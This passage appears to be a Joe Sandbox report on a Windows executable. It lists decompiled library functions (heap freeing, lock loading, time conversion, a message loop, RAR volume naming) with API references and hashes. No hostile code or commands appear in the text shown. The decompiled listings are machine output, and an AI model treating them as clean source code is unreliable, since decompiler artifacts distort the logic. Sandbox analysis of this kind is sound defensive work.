Instruction ID: 3cf2593112e692bd74d4f3ae4d8cbf45afcd5e1cc3138aefd62e2051be0acf95
Opcode Fuzzy Hash: 59a1ece60c6b263626e382ee9a1fe342809918f083d9c77cd9c5a85cb6724ea9
Instruction Fuzzy Hash: C1314C3A6443456ADA30AF549D42B7773E4FBD0360F50843EF886572C0FB64ADAA83A1

Uniqueness

Uniqueness Score: -1.00%

Function 00A5C8A4 Relevance: 10.6, APIs: 7, Instructions: 65
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00A5C8A4(intOrPtr _a4) {
				void* _t18;

				_t45 = _a4;
				if(_a4 != 0) {
					E00A5C868(_t45, 7);
					E00A5C868(_t45 + 0x1c, 7);
					E00A5C868(_t45 + 0x38, 0xc);
					E00A5C868(_t45 + 0x68, 0xc);
					E00A5C868(_t45 + 0x98, 2);
					E00A58DCC( *((intOrPtr*)(_t45 + 0xa0)));
					E00A58DCC( *((intOrPtr*)(_t45 + 0xa4)));
					E00A58DCC( *((intOrPtr*)(_t45 + 0xa8)));
					E00A5C868(_t45 + 0xb4, 7);
					E00A5C868(_t45 + 0xd0, 7);
					E00A5C868(_t45 + 0xec, 0xc);
					E00A5C868(_t45 + 0x11c, 0xc);
					E00A5C868(_t45 + 0x14c, 2);
					E00A58DCC( *((intOrPtr*)(_t45 + 0x154)));
					E00A58DCC( *((intOrPtr*)(_t45 + 0x158)));
					E00A58DCC( *((intOrPtr*)(_t45 + 0x15c)));
					return E00A58DCC( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}

0x00a5c8aa
0x00a5c8af
0x00a5c8b8
0x00a5c8c3
0x00a5c8ce
0x00a5c8d9
0x00a5c8e7
0x00a5c8f2
0x00a5c8fd
0x00a5c908
0x00a5c916
0x00a5c924
0x00a5c935
0x00a5c943
0x00a5c951
0x00a5c95c
0x00a5c967
0x00a5c972
0x00000000
0x00a5c982
0x00a5c987

APIs

Part of subcall function 00A5C868: _free.LIBCMT ref: 00A5C891

_free.LIBCMT ref: 00A5C8F2

Part of subcall function 00A58DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00A5C896,?,00000000,?,00000000,?,00A5C8BD,?,00000007,?,?,00A5CCBA,?), ref: 00A58DE2
Part of subcall function 00A58DCC: GetLastError.KERNEL32(?,?,00A5C896,?,00000000,?,00000000,?,00A5C8BD,?,00000007,?,?,00A5CCBA,?,?), ref: 00A58DF4

_free.LIBCMT ref: 00A5C8FD
_free.LIBCMT ref: 00A5C908
_free.LIBCMT ref: 00A5C95C
_free.LIBCMT ref: 00A5C967
_free.LIBCMT ref: 00A5C972
_free.LIBCMT ref: 00A5C97D

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
Instruction ID: dd66b3cb24e24f5af595d178f605cc2e3bc9033f890948332a053b15141b94d2
Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
Instruction Fuzzy Hash: F8110D72580B08AAE620B7B1CD07FCB7BECBF14B12F404C15FA9D66097DA79A5498750

Uniqueness

Uniqueness Score: -1.00%

Function 00A4E5EE Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 94%

			E00A4E5EE() {
				intOrPtr _t3;
				_Unknown_base(*)()* _t7;
				_Unknown_base(*)()* _t10;
				struct HINSTANCE__* _t15;

				_t3 =  *0xa91cd8;
				if(_t3 == 1) {
					L11:
					return 0;
				}
				if(_t3 != 0) {
					return 1;
				}
				_t15 = GetModuleHandleW(L"KERNEL32.DLL");
				if(_t15 != 0) {
					_t7 = GetProcAddress(_t15, "AcquireSRWLockExclusive");
					if(_t7 == 0) {
						goto L3;
					}
					 *0xa91cdc = _t7;
					_t10 = GetProcAddress(_t15, "ReleaseSRWLockExclusive");
					if(_t10 == 0) {
						goto L3;
					}
					 *0xa91ce0 = _t10;
					L7:
					asm("lock cmpxchg [edx], ecx");
					if(0 != 0 || _t15 != 1) {
						return 0xbadbad;
					} else {
						goto L11;
					}
				}
				L3:
				_t15 = 1;
				goto L7;
			}

0x00a4e5ee
0x00a4e5fa
0x00a4e65f
0x00000000
0x00a4e65f
0x00a4e5fe
0x00000000
0x00a4e65b
0x00a4e60b
0x00a4e60f
0x00a4e61b
0x00a4e623
0x00000000
0x00000000
0x00a4e62b
0x00a4e630
0x00a4e638
0x00000000
0x00000000
0x00a4e63a
0x00a4e63f
0x00a4e648
0x00a4e64e
0x00000000
0x00000000
0x00000000
0x00000000
0x00a4e64e
0x00a4e611
0x00a4e611
0x00000000

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00A4E669,00A4E5CC,00A4E86D), ref: 00A4E605
GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00A4E61B
GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00A4E630

Strings

AcquireSRWLockExclusive, xrefs: 00A4E615
ReleaseSRWLockExclusive, xrefs: 00A4E625
KERNEL32.DLL, xrefs: 00A4E600

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
API String ID: 667068680-1718035505
Opcode ID: bfa5302e69c66c9bda43892cac442fe7435d95b1dbd4a5ecd08b68329dc633dd
Instruction ID: 6704e384b3895f4386ea8ff6c1e17a2e6cc5f2e19c926d029134604c60ef9320
Opcode Fuzzy Hash: bfa5302e69c66c9bda43892cac442fe7435d95b1dbd4a5ecd08b68329dc633dd
Instruction Fuzzy Hash: 3AF0F63EB80262AB0F21CFF46C88966E2E87AA5741F03093ED902D3140EB60CC565B90

Uniqueness

Uniqueness Score: -1.00%

Function 00A4146A Relevance: 9.1, APIs: 6, Instructions: 98
timeCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E00A4146A(signed int* __ecx, void* __edx, intOrPtr* _a4) {
				char _v16;
				struct _SYSTEMTIME _v32;
				struct _SYSTEMTIME _v48;
				struct _FILETIME _v64;
				struct _FILETIME _v72;
				intOrPtr _v76;
				struct _FILETIME _v84;
				signed int _t56;
				signed int _t70;
				signed int _t72;
				signed int _t77;
				signed int _t85;
				intOrPtr* _t89;
				signed int _t90;
				signed int _t92;
				signed int* _t93;

				_t89 = _a4;
				_t93 = __ecx;
				_v48.wYear =  *_t89;
				_v48.wMonth =  *((intOrPtr*)(_t89 + 4));
				_v48.wDay =  *((intOrPtr*)(_t89 + 8));
				_v48.wHour =  *((intOrPtr*)(_t89 + 0xc));
				_v48.wMinute =  *((intOrPtr*)(_t89 + 0x10));
				_v48.wSecond =  *((intOrPtr*)(_t89 + 0x14));
				_v48.wMilliseconds = 0;
				_v48.wDayOfWeek.wYear = 0;
				if(SystemTimeToFileTime( &_v48,  &_v64) == 0) {
					_t90 = 0;
					_t77 = 0;
				} else {
					if(E00A3B146() >= 0x600) {
						FileTimeToSystemTime( &_v64,  &_v32);
						__imp__TzSpecificLocalTimeToSystemTime(0,  &_v32,  &_v16);
						SystemTimeToFileTime( &(_v32.wDayOfWeek),  &_v84);
						SystemTimeToFileTime( &(_v48.wDayOfWeek),  &(_v72.dwHighDateTime));
						_t70 = _v84.dwHighDateTime + _v72.dwLowDateTime;
						asm("sbb eax, [esp+0x24]");
						asm("sbb eax, esi");
						asm("adc eax, esi");
						_t85 = 0 - _v72.dwHighDateTime.dwLowDateTime + _v84.dwLowDateTime + _v76;
						asm("adc eax, esi");
					} else {
						LocalFileTimeToFileTime( &_v64,  &_v72);
						_t70 = _v72.dwHighDateTime.dwLowDateTime;
						_t85 = _v72.dwLowDateTime;
					}
					_t92 = 0x64;
					_t72 = _t85;
					_t77 = _t70 * _t92 + (_t72 * _t92 >> 0x20);
					_t90 = _t72 * _t92;
				}
				 *_t93 = _t90;
				_a4 = _t77;
				_t56 =  *((intOrPtr*)(_t89 + 0x18)) + _t90;
				asm("adc ecx, ebx");
				 *_t93 = _t56;
				_a4 = 0;
				return _t56;
			}

0x00a41471
0x00a41475
0x00a4147a
0x00a41483
0x00a4148c
0x00a41495
0x00a4149e
0x00a414a7
0x00a414ae
0x00a414b3
0x00a414ca
0x00a4156c
0x00a4156e
0x00a414d0
0x00a414da
0x00a41500
0x00a41513
0x00a41523
0x00a41533
0x00a4153f
0x00a41545
0x00a4154d
0x00a41553
0x00a41555
0x00a41559
0x00a414dc
0x00a414e6
0x00a414ec
0x00a414f0
0x00a414f0
0x00a4155d
0x00a41562
0x00a41566
0x00a41568
0x00a41568
0x00a41570
0x00a41575
0x00a4157b
0x00a4157e
0x00a41580
0x00a41584
0x00a4158c

APIs

SystemTimeToFileTime.KERNEL32(?,?), ref: 00A414C2

Part of subcall function 00A3B146: GetVersionExW.KERNEL32(?), ref: 00A3B16B

LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00A414E6
FileTimeToSystemTime.KERNEL32(?,?), ref: 00A41500
TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00A41513
SystemTimeToFileTime.KERNEL32(?,?), ref: 00A41523
SystemTimeToFileTime.KERNEL32(?,?), ref: 00A41533

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion
String ID:
API String ID: 2092733347-0
Opcode ID: 0a8c5ec0d9c5eff1a50784882e01d0d467e1d1aa62517a13d83f90775e6814d6
Instruction ID: c16644b88cd4e26a0920c6a42eb4b68128d572d9aacf125ac2ad0bda3b300167
Opcode Fuzzy Hash: 0a8c5ec0d9c5eff1a50784882e01d0d467e1d1aa62517a13d83f90775e6814d6
Instruction Fuzzy Hash: 3531E87A118345ABC704DFA8C88499BB7F8BF98714F004A1EF999C3210E770D549CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 00A52AFA Relevance: 9.1, APIs: 6, Instructions: 60
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 83%

			E00A52AFA(void* __ecx, void* __edx) {
				void* _t4;
				void* _t8;
				void* _t11;
				void* _t13;
				void* _t14;
				void* _t16;
				void* _t18;
				void* _t24;
				long _t25;
				void* _t28;

				_t13 = __ecx;
				if( *0xa6e7d0 != 0xffffffff) {
					_t25 = GetLastError();
					_t11 = E00A53CCD(_t13, __eflags,  *0xa6e7d0);
					_t14 = _t24;
					__eflags = _t11 - 0xffffffff;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						__eflags = _t11;
						if(__eflags == 0) {
							_t4 = E00A53D08(_t14, __eflags,  *0xa6e7d0, 0xffffffff);
							_pop(_t16);
							__eflags = _t4;
							if(_t4 != 0) {
								_push(0x28);
								_t28 = E00A58DC1(_t16);
								_t18 = 1;
								__eflags = _t28;
								if(__eflags == 0) {
									L8:
									_t11 = 0;
									E00A53D08(_t18, __eflags,  *0xa6e7d0, 0);
								} else {
									_t8 = E00A53D08(_t18, __eflags,  *0xa6e7d0, _t28);
									_pop(_t18);
									__eflags = _t8;
									if(__eflags != 0) {
										_t11 = _t28;
										_t28 = 0;
										__eflags = 0;
									} else {
										goto L8;
									}
								}
								L00A53E2E(_t28);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t25);
					return _t11;
				} else {
					return 0;
				}
			}

0x00a52afa
0x00a52b01
0x00a52b14
0x00a52b1b
0x00a52b1d
0x00a52b1e
0x00a52b21
0x00a52b3a
0x00a52b3a
0x00a52b23
0x00a52b23
0x00a52b25
0x00a52b2f
0x00a52b35
0x00a52b36
0x00a52b38
0x00a52b3f
0x00a52b48
0x00a52b4b
0x00a52b4c
0x00a52b4e
0x00a52b62
0x00a52b62
0x00a52b6b
0x00a52b50
0x00a52b57
0x00a52b5d
0x00a52b5e
0x00a52b60
0x00a52b74
0x00a52b76
0x00a52b76
0x00000000
0x00000000
0x00000000
0x00a52b60
0x00a52b79
0x00000000
0x00000000
0x00000000
0x00a52b38
0x00a52b25
0x00a52b81
0x00a52b8b
0x00a52b03
0x00a52b05
0x00a52b05

APIs

GetLastError.KERNEL32(?,?,00A52AF1,00A502FC,00A4FA34), ref: 00A52B08
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00A52B16
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00A52B2F
SetLastError.KERNEL32(00000000,00A52AF1,00A502FC,00A4FA34), ref: 00A52B81

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: f6ef17b9ed190da541a3ec6a4b5b17fe277822fc5ca2c15326c8625ff907e2c5
Instruction ID: 70b011561b6c90cbb2bc8be33d9ace3ce5d31233e82681a9262625a5b07b1142
Opcode Fuzzy Hash: f6ef17b9ed190da541a3ec6a4b5b17fe277822fc5ca2c15326c8625ff907e2c5
Instruction Fuzzy Hash: A501D4371083116EAE256BB47C85A262BB9FB527B77610739FD20950E1FFB15C0E9344

Uniqueness

Uniqueness Score: -1.00%

Function 00A597E5 Relevance: 9.0, APIs: 6, Instructions: 50
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 69%

			E00A597E5(void* __ebx, void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				void* _t3;
				void* _t4;
				intOrPtr _t9;
				void* _t10;
				void* _t11;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t30;
				void* _t31;
				void* _t32;
				long _t36;
				long _t37;
				void* _t40;

				_t29 = __edx;
				_t23 = __ecx;
				_t20 = __ebx;
				_push(_t30);
				_t36 = GetLastError();
				_t2 =  *0xa6e7fc; // 0x6
				_t42 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t3 = E00A5B136(_t23, 1, 0x364);
					_t31 = _t3;
					_pop(_t25);
					if(_t31 != 0) {
						_t4 = E00A5AEB1(_t20, _t25, _t31, __eflags,  *0xa6e7fc, _t31);
						__eflags = _t4;
						if(_t4 != 0) {
							E00A59649(_t25, _t31, 0xa92288);
							E00A58DCC(0);
							_t40 = _t40 + 0xc;
							__eflags = _t31;
							if(_t31 == 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t31);
							goto L4;
						}
					} else {
						_push(_t3);
						L4:
						E00A58DCC();
						_pop(_t25);
						L9:
						SetLastError(_t36);
						E00A58D24(_t20, _t29, _t31, _t36);
						asm("int3");
						_push(_t20);
						_push(_t36);
						_push(_t31);
						_t37 = GetLastError();
						_t21 = 0;
						_t9 =  *0xa6e7fc; // 0x6
						_t45 = _t9 - 0xffffffff;
						if(_t9 == 0xffffffff) {
							L12:
							_t10 = E00A5B136(_t25, 1, 0x364); // executed
							_t32 = _t10;
							_pop(_t27);
							if(_t32 != 0) {
								_t11 = E00A5AEB1(_t21, _t27, _t32, __eflags,  *0xa6e7fc, _t32);
								__eflags = _t11;
								if(_t11 != 0) {
									E00A59649(_t27, _t32, 0xa92288);
									E00A58DCC(_t21);
									__eflags = _t32;
									if(_t32 != 0) {
										goto L19;
									} else {
										goto L18;
									}
								} else {
									_push(_t32);
									goto L14;
								}
							} else {
								_push(_t21);
								L14:
								E00A58DCC();
								L18:
								SetLastError(_t37);
							}
						} else {
							_t32 = E00A5AE5B(0, _t25, _t31, _t45, _t9);
							if(_t32 != 0) {
								L19:
								SetLastError(_t37);
								_t21 = _t32;
							} else {
								goto L12;
							}
						}
						return _t21;
					}
				} else {
					_t31 = E00A5AE5B(__ebx, _t23, _t30, _t42, _t2);
					if(_t31 != 0) {
						L8:
						SetLastError(_t36);
						return _t31;
					} else {
						goto L2;
					}
				}
			}

0x00a597e5
0x00a597e5
0x00a597e5
0x00a597e8
0x00a597ef
0x00a597f1
0x00a597f6
0x00a597f9
0x00a59807
0x00a5980e
0x00a59813
0x00a59816
0x00a59819
0x00a5982b
0x00a59830
0x00a59832
0x00a5983d
0x00a59844
0x00a59849
0x00a5984c
0x00a5984e
0x00000000
0x00000000
0x00000000
0x00000000
0x00a59834
0x00a59834
0x00000000
0x00a59834
0x00a5981b
0x00a5981b
0x00a5981c
0x00a5981c
0x00a59821
0x00a5985c
0x00a5985d
0x00a59863
0x00a59868
0x00a5986b
0x00a5986c
0x00a5986d
0x00a59874
0x00a59876
0x00a59878
0x00a5987d
0x00a59880
0x00a5988e
0x00a59895
0x00a5989a
0x00a5989d
0x00a598a0
0x00a598b2
0x00a598b7
0x00a598b9
0x00a598c4
0x00a598ca
0x00a598d2
0x00a598d4
0x00000000
0x00000000
0x00000000
0x00000000
0x00a598bb
0x00a598bb
0x00000000
0x00a598bb
0x00a598a2
0x00a598a2
0x00a598a3
0x00a598a3
0x00a598d6
0x00a598d7
0x00a598d7
0x00a59882
0x00a59888
0x00a5988c
0x00a598df
0x00a598e0
0x00a598e6
0x00000000
0x00000000
0x00000000
0x00a5988c
0x00a598ed
0x00a598ed
0x00a597fb
0x00a59801
0x00a59805
0x00a59850
0x00a59851
0x00a5985b
0x00000000
0x00000000
0x00000000
0x00a59805

APIs

GetLastError.KERNEL32(?,00A71098,00A54674,00A71098,?,?,00A540EF,?,?,00A71098), ref: 00A597E9
_free.LIBCMT ref: 00A5981C
_free.LIBCMT ref: 00A59844
SetLastError.KERNEL32(00000000,?,00A71098), ref: 00A59851
SetLastError.KERNEL32(00000000,?,00A71098), ref: 00A5985D
_abort.LIBCMT ref: 00A59863

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 47bd91c3ed0b6e31ee36192463470880c3f68db215bf90047a8be71b26a1e256
Instruction ID: 17f5c286e03e74325e0ca38d2546e361ff7f0c1076573acb1ae8fb109bf2a301
Opcode Fuzzy Hash: 47bd91c3ed0b6e31ee36192463470880c3f68db215bf90047a8be71b26a1e256
Instruction Fuzzy Hash: 1EF0F437200A01B6CA1277647D0AA2B1AB9BFF2B23F250124FD25AA192EF70880F4161

Uniqueness

Uniqueness Score: -1.00%

Function 00A4DC3B Relevance: 9.0, APIs: 6, Instructions: 42
windowsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A4DC3B(void* _a4) {
				struct tagMSG _v32;
				long _t7;
				long _t10;

				_t7 = WaitForSingleObject(_a4, 0xa);
				if(_t7 == 0x102) {
					do {
						if(PeekMessageW( &_v32, 0, 0, 0, 0) != 0) {
							GetMessageW( &_v32, 0, 0, 0);
							TranslateMessage( &_v32);
							DispatchMessageW( &_v32);
						}
						_t10 = WaitForSingleObject(_a4, 0xa);
					} while (_t10 == 0x102);
					return _t10;
				}
				return _t7;
			}

0x00a4dc47
0x00a4dc54
0x00a4dc59
0x00a4dc69
0x00a4dc72
0x00a4dc7c
0x00a4dc86
0x00a4dc86
0x00a4dc91
0x00a4dc97
0x00000000
0x00a4dc9b
0x00a4dc9e

APIs

WaitForSingleObject.KERNEL32(?,0000000A), ref: 00A4DC47
PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00A4DC61
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00A4DC72
TranslateMessage.USER32(?), ref: 00A4DC7C
DispatchMessageW.USER32(?), ref: 00A4DC86
WaitForSingleObject.KERNEL32(?,0000000A), ref: 00A4DC91

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: Message$ObjectSingleWait$DispatchPeekTranslate
String ID:
API String ID: 2148572870-0
Opcode ID: 1c64ee8723b57b162c7ab27d31eb25634604c65d408e49ee9b80ae8dddbc3d4c
Instruction ID: 289ed6997c211ca4c49a6f2b9f303b68e07da5880ad838f19fabe5279907a268
Opcode Fuzzy Hash: 1c64ee8723b57b162c7ab27d31eb25634604c65d408e49ee9b80ae8dddbc3d4c
Instruction Fuzzy Hash: A2F01972A01219BACE20ABE5EC4DDCB7F7DEF42791B004012F50AE2060DA64864AC6A0

Uniqueness

Uniqueness Score: -1.00%

Function 00A3C0C5 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 148
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A3C0C5(short* _a4, char _a12) {
				signed short* _v4;
				void* __ebp;
				intOrPtr* _t20;
				signed short* _t24;
				char _t27;
				char _t30;
				signed short* _t31;
				short _t32;
				signed int _t33;
				short _t34;
				signed short* _t37;
				char _t39;
				char _t40;
				char _t41;
				intOrPtr _t44;
				void* _t47;
				void* _t48;
				short* _t54;
				intOrPtr* _t56;
				signed short _t57;
				short* _t58;
				intOrPtr* _t59;
				signed int _t62;
				signed short* _t63;
				short _t66;
				signed short _t67;

				_t58 = _a4;
				_t20 = E00A3B92D(_t58);
				_t44 = _a4;
				_t59 = _t20;
				_t68 = _t59;
				if(_t59 != 0) {
					__eflags =  *((intOrPtr*)(_t59 + 2));
					if( *((intOrPtr*)(_t59 + 2)) == 0) {
						L7:
						__eflags = _t44 - (_t59 - _t58 >> 1);
						E00A40602(_t59, L".rar", _t44 - (_t59 - _t58 >> 1));
					} else {
						_t40 = E00A41FBB(_t59, L".exe");
						__eflags = _t40;
						if(_t40 == 0) {
							goto L7;
						} else {
							_t41 = E00A41FBB(_t59, L".sfx");
							__eflags = _t41;
							if(_t41 == 0) {
								goto L7;
							}
						}
					}
				} else {
					E00A405DA(_t68, _t58, L".rar", _t44);
					_t59 = E00A3B92D(_t58);
					if(_t59 == 0) {
						L2:
						 *_t58 = 0;
						return 0;
					}
				}
				_t24 = 0x2e;
				_v4 = _t24;
				__eflags =  *_t59 - _t24;
				if( *_t59 != _t24) {
					goto L2;
				}
				__eflags =  *((intOrPtr*)(_t59 + 2));
				if( *((intOrPtr*)(_t59 + 2)) == 0) {
					goto L2;
				}
				__eflags = _a12;
				if(__eflags != 0) {
					_t12 = _t59 + 4; // 0x4
					_t65 = _t12;
					_t27 = E00A4047A( *_t12 & 0x0000ffff);
					__eflags = _t27;
					if(_t27 == 0) {
						L30:
						return E00A40602(_t65, L"00", _t44 - (_t59 - _t58 >> 1) - 2);
					}
					_t30 = E00A4047A( *(_t59 + 6) & 0x0000ffff);
					__eflags = _t30;
					if(_t30 == 0) {
						goto L30;
					}
					_t31 = E00A53E13(_t59);
					_t47 = 0x3a;
					_t14 = _t31 - 1; // -1
					_t54 = _t59 + _t14 * 2;
					 *_t54 =  *_t54 + 1;
					__eflags =  *_t54 - _t47;
					if( *_t54 == _t47) {
						_t66 = 0x30;
						while(1) {
							__eflags = _t54 - _t58;
							if(_t54 <= _t58) {
								break;
							}
							_t33 =  *(_t54 - 2) & 0x0000ffff;
							_t62 = _t33;
							__eflags = _t33 - _v4;
							if(_t33 == _v4) {
								break;
							}
							 *_t54 = _t66;
							_t34 = _t62 + 1;
							_t54 = _t54 + 0xfffffffe;
							 *_t54 = _t34;
							__eflags = _t34 - _t47;
							if(_t34 == _t47) {
								continue;
							}
							return _t34;
						}
						_t32 = 0x61;
						 *_t54 = _t32;
						return _t32;
					}
				} else {
					_t31 = E00A3BA1E(0, __eflags, _t58);
					_t63 = _t31;
					_t48 = 0x3a;
					 *_t63 =  *_t63 + 1;
					__eflags =  *_t63 - _t48;
					if( *_t63 == _t48) {
						_t67 = 0x30;
						while(1) {
							_v4 = _t63;
							 *_t63 = _t67;
							_t63 = _t63 - 2;
							__eflags = _t63 - _t58;
							if(_t63 < _t58) {
								break;
							}
							_t39 = E00A4047A( *_t63 & 0x0000ffff);
							__eflags = _t39;
							if(_t39 == 0) {
								break;
							}
							 *_t63 =  *_t63 + 1;
							__eflags =  *_t63 - _t48;
							if( *_t63 == _t48) {
								continue;
							}
							return _t39;
						}
						_t56 = _t58 + E00A53E13(_t58) * 2;
						while(1) {
							__eflags = _t56 - _t63;
							if(_t56 == _t63) {
								break;
							}
							 *((short*)(_t56 + 2)) =  *_t56;
							_t56 = _t56 - 2;
							__eflags = _t56;
						}
						_t37 = _v4;
						_t57 = 0x31;
						 *_t37 = _t57;
						return _t37;
					}
				}
				return _t31;
			}

0x00a3c0ca
0x00a3c0cf
0x00a3c0d4
0x00a3c0d8
0x00a3c0dc
0x00a3c0de
0x00a3c105
0x00a3c109
0x00a3c129
0x00a3c131
0x00a3c13a
0x00a3c10b
0x00a3c111
0x00a3c116
0x00a3c118
0x00000000
0x00a3c11a
0x00a3c120
0x00a3c125
0x00a3c127
0x00000000
0x00000000
0x00a3c127
0x00a3c118
0x00a3c0e0
0x00a3c0e7
0x00a3c0f2
0x00a3c0f6
0x00a3c0f8
0x00a3c0fa
0x00000000
0x00a3c0fa
0x00a3c0f6
0x00a3c141
0x00a3c142
0x00a3c146
0x00a3c149
0x00000000
0x00000000
0x00a3c14b
0x00a3c14f
0x00000000
0x00000000
0x00a3c151
0x00a3c156
0x00a3c1bf
0x00a3c1bf
0x00a3c1c7
0x00a3c1cc
0x00a3c1ce
0x00a3c22f
0x00000000
0x00a3c23f
0x00a3c1d5
0x00a3c1da
0x00a3c1dc
